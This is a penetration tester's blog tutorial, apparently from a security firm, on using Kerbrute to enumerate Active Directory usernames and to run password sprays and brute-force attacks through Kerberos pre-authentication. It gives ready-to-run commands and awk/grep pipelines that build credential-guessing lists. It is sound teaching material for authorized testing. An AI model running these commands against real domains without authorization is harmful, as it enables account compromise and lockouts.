The Exploit

Notes from the Front Lines of Penetration Testing

Cool Tools Series: Kerbrute

Posted on

Categories: , , ,
Cool Tools Series: Kerbrute

Written by

When I’m looking to enumerate and brute force Active Directory (AD) accounts through Kerberos pre-authentication for cloud and internal network pentests and red team engagements, kerbrute is my go-to tool. 

Kerbrute is an open-source tool that is simple to use, and it places several useful commands at a pentester’s fingertips.

Getting Started

When you run the tool without any arguments you get a general help page:

Kerbrute Help Page

I mostly use userenum and sometimes passwordspray.

User Enumeration

When doing user enumeration you will need a potential list of usernames for kerbrute to validate. I usually use sites like DeHashed and LinkedIn to grab names of employees. Linkedin2username is great tool for creating a username list from LinkedIn.

I’m doing this in my lab, so here’s an example list. You can use a much larger list as the tool is quick, generally testing thousands of usernames in only a few minutes. 

User list

To gather a list of valid users you will need the domain you are targeting. Usually this is easy to find with something like NetExec:

Using NetExec to get a list of valid users.

After finding the domain, you just need to run kerbrute with the userenum flag and the list of users.

Most of the time kerbrute will successfully find any Kerberos servers (usually domain controllers) on its own. However, if it doesn’t you can use the –dc flag to point it in the right direction.  

You will pass the target domain with the -d flag.

./kerbrute userenum -d [Target Domain] [User List] --dc [DC IP]
Using the --dc flag in Kerbrute to find domain controllers

I also normally use the -o flag, which will save the output to a file for later use.

./kerbrute userenum -d [Target Domain] [User List] --dc [DC IP] -o [Output File]
Using the -o flag to save output to a file

The output file will basically look the same as the output you see and a simple combination of grep and awk can grab the valid usernames.

The userenum mode does not increment the bad password count, meaning that you won’t lock accounts out:

Userenum does not increment the bad password count.

Brute Force

You can use kerbrute to brute force a list of users from a file or from stdin. In this mode kerbrute will take username and password combos in the form of username:password. Blank lines or lines with blank usernames or passwords will be skipped. 

The best way to use this, in my opinion, is to test known possible password combos or to test usernames as the password. I don’t normally use this mode, but, if want to try usernames as passwords, I would take my output from the userenum step above. 

Here is the command to get list of users from output:

cat [Output List] | grep "\[+\] VALID USERNAME" | awk -F" " '{print $7}' | awk -F"@" '{print $1}' | sort -u > users-list-confirmed

You can then take this list of users and easily get a colon separated list with the username on both sides with awk:

cat [User List] | awk '{print $0":"$0}' > combo-list

Then all you have to do is run kerbrute:

./kerbrute bruteforce --dc [DC IP] -d [Domain] [Combo List]

This will increment the failed login count, so using this command can lock out accounts. Beware.

Password Spray

You can use kerbrute to spray one password against a list of users. Again, this can lock accounts, so be careful not to try too many passwords too quickly.

This will try the same password against each user in the list. If you have the correct password, it will print a success. 

kerbrute passwordspray --dc [DC IP] -d [Domain] [Userlist] [Password]
Kerbrute showing a valid password discovered

Brute Force User

This will take one username and try all the passwords in a list against that user. This can and will lock accounts out. This isn’t something you’ll see very often, as most domains will have a lockout policy. But, if you end up in a situation where you can use it, here’s how.

You will need a list of passwords and a user to target:

./kerbrute bruteuser -d [Domain] --dc [DC IP] [Password List] [Username]

There is a –safe option that will auto stop if any account comes back as locked out. It can be useful for stopping widespread problems and as a secondary safeguard to minimize locking people out.

Here’s an example where I used the safe flag and kerbrute stopped after the account came back as locked out.

Safe flag causing Kerbrute to stop after one lock out

Final Thoughts

Kerbrute’s ability to efficiently and discreetly enumerate Active Directory users and to perform password spraying and brute forcing attacks makes it an important tool for every penetration tester. 

If you enjoyed this tutorial, you may also enjoy my AD Series, including this Using Evil-WinRM to get NTDS Manually post as well.


Andrew Trexler

Also by Andrew Trexler

Human Vs AI Pentesting

While AI tools offer speed in detecting known vulnerabilities, they fall short with 20-35% false positives and only 50-65% success on complex threats like business logic flaws, as per mainstream reports from Verizon and OWASP. Human penetration testers at Raxis deliver 85-90% detection rates, precise prioritization, and ethical adaptability, ensuring your organization stays ahead of real-world attacks.

Partner With Raxis

Partnering with Raxis empowers your business with elite penetration testing services, competitive reseller pricing, and recurring revenue opportunities, all backed by a proven track record of excellence and a commitment to staying ahead of evolving cybersecurity threats.

Penetration Testing

Tailored, expert-led penetration testing services that uncovers hidden vulnerabilities using real-world hacker techniques, providing actionable insights to strengthen your defenses and protect against sophisticated cyber threats.

Ready To See Raxis One In Action?

See how we transform traditional pen testing into interactive security intelligence that keeps you informed every step of the way. From real-time attack progression to detailed remediation guidance, Raxis One gives you unprecedented visibility into your security posture as it’s being tested.